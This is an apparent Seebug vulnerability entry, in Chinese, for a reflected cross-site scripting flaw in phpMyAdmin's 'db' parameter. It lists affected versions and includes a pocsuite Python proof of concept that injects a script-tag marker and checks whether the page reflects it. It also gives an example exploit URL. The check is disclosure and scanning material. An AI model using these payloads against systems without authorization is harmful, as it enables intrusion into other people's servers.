phpMyAdmin 'db'参数跨站脚本漏洞

2009-07-03T00:00:00
ID SSV:11748
Type seebug
Reporter Root
Modified 2009-07-03T00:00:00

Description

Bugtraq ID: 35531 CNCAN ID:CNCAN-2009070104

phpMyAdmin是一款基于PHP的MySQL管理程序。 phpMyAdmin存在输入验证问题，远程攻击者可以利用该漏洞进行跨站脚本攻击，获得敏感信息。 问题源于对'db'参数缺少过滤：攻击者将恶意脚本代码作为该参数提交后，可触发跨站脚本攻击。

受影响版本：phpMyAdmin 3.3.0-dev、3.2.1-dev、3.2.0.1、3.2.0-rc1、2.11.10-dev。目前尚未提供解决方案，详情参见：http://www.phpmyadmin.net/

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests

'''
vulurl:
http://www.example.com/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10

'''

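class TestPOC(POCBase):
    """Reflected XSS check for the phpMyAdmin ``db`` parameter (ssvid 11748).

    ``_verify`` sends a fixed marker ``<script>`` tag in the ``db`` query
    parameter of ``index.php`` and reports success only when that exact
    marker appears in the response body, i.e. the value was echoed back
    without HTML escaping.  ``_attack`` performs the same check.
    """
    vulID = '11748'  # ssvid
    version = '1.0'
    author = ['XXXX']
    vulDate = ''
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-11748']
    name = 'phpMyAdmin db参数跨站脚本漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = 'XSS'
    desc = '''
    phpMyAdmin db参数跨站脚本漏洞
    '''
    samples = ['']

    # Marker looked for in the response; kept in one place so what is sent
    # and what is matched cannot drift apart.
    _MARKER = '<script>prompt("SEBUG@TEST");</script>'
    # Request timeout in seconds (constructed value) so an unresponsive host
    # cannot stall the whole scan; the original request had no timeout.
    _TIMEOUT = 10

    def _verify(self):
        """Request index.php with the marker in ``db`` and check for reflection.

        Returns:
            The ``Output`` built by :meth:`parse_output`: success with the
            final request URL under ``XSSInfo`` when the marker is reflected
            verbatim, failure otherwise.

        Raises:
            Whatever ``requests.get`` raises on a failed request; it is left
            to propagate exactly as in the original implementation.
        """
        result = {}

        # rstrip avoids a doubled slash when self.url already ends with '/';
        # the query string itself is byte-identical to the original check.
        vulurl = self.url.rstrip('/') + '/index.php?db=">\'>' + self._MARKER

        r = requests.get(vulurl, timeout=self._TIMEOUT)
        print(r.url)  # parenthesised so the line is valid on Python 2 and 3

        # r.text (not r.content) keeps the substring test str-vs-str under
        # Python 3; the marker is ASCII so decoding cannot change the match.
        if self._MARKER in r.text:
            result['XSSInfo'] = {'URL': r.url}

        return self.parse_output(result)

    def _attack(self):
        """Attack mode is identical to verification for a reflected XSS check."""
        return self._verify()

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        Args:
            result: dict filled by ``_verify``; non-empty means the marker
                was reflected.

        Returns:
            ``Output`` marked success (carrying ``result``) when ``result``
            is non-empty, otherwise marked failed with the original message.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output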

register(TestPOC)  # hand the POC class to the pocsuite runner